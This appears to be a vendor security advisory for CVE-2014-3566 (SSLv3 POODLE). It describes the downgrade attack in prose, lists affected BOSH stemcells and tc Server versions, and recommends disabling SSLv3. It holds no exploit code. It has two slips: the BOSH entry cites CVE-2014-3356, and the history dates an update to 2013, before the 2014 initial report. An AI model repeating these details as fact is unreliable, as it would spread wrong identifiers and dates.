CVE-2014-3566 SSLV3 POODLE

Moderate

Vendor

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i

Versions Affected

• SSLv3

Description

SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346] and TLS 1.2 [RFC5246], many TLS implementations remain backwards ­compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.

The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. However, even if a client and server both support a version of TLS, the security level offered by SSL 3.0 is still relevant since many clients implement a protocol downgrade dance to work around server­side interoperability bugs. Attackers can exploit the downgrade dance and break the cryptographic security of SSL 3.0. Our POODLE attack (Padding Oracle On Downgraded Legacy Encryption) will allow them, for example, to steal “secure” HTTP cookies (or other bearer tokens such as HTTP Authorization header contents).

Affected Products and Versions

_Severity is moderate unless otherwise noted.
_

• BOSH: All versions of Cloud Foundry BOSH stemcells 2743 and prior use SSLv3 and thus are vulnerable to CVE-2014-3356
• tc Server 2.9.0 to 2.9.7 and 3.0.0 to 3.0.1. Previous, unsupported tc Server versions may also be affected.

Mitigation

The Cloud Foundry project recommends that HAProxy or any other ELBs is use be updated to disable SSLv3 as a workaround that resolves CVE-2014-3566.

The details published by the Apache Software Foundation for mitigating this attack for Apache Tomcat apply equally to tc Runtime instances. The tc Server team is tracking the work of the Apache Tomcat project to release versions of Apache Tomcat that disable SSLv3 by default. tc Server releases will follow the releases from the Apache Software Foundation.

Credit

Google researchers Bodo Möller, Thai Duong and Krzysztof Kotowicz released a paper discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.

References

• <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566&gt;
• <https://www.openssl.org/~bodo/ssl-poodle.pdf&gt;
• <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells&gt;
• <https://github.com/cloudfoundry/cf-release&gt;
• <https://wiki.apache.org/tomcat/Security/POODLE&gt;

History

2014-Oct-16: Initial vulnerability report published.

2013-Nov-03: Updated to include tc Server information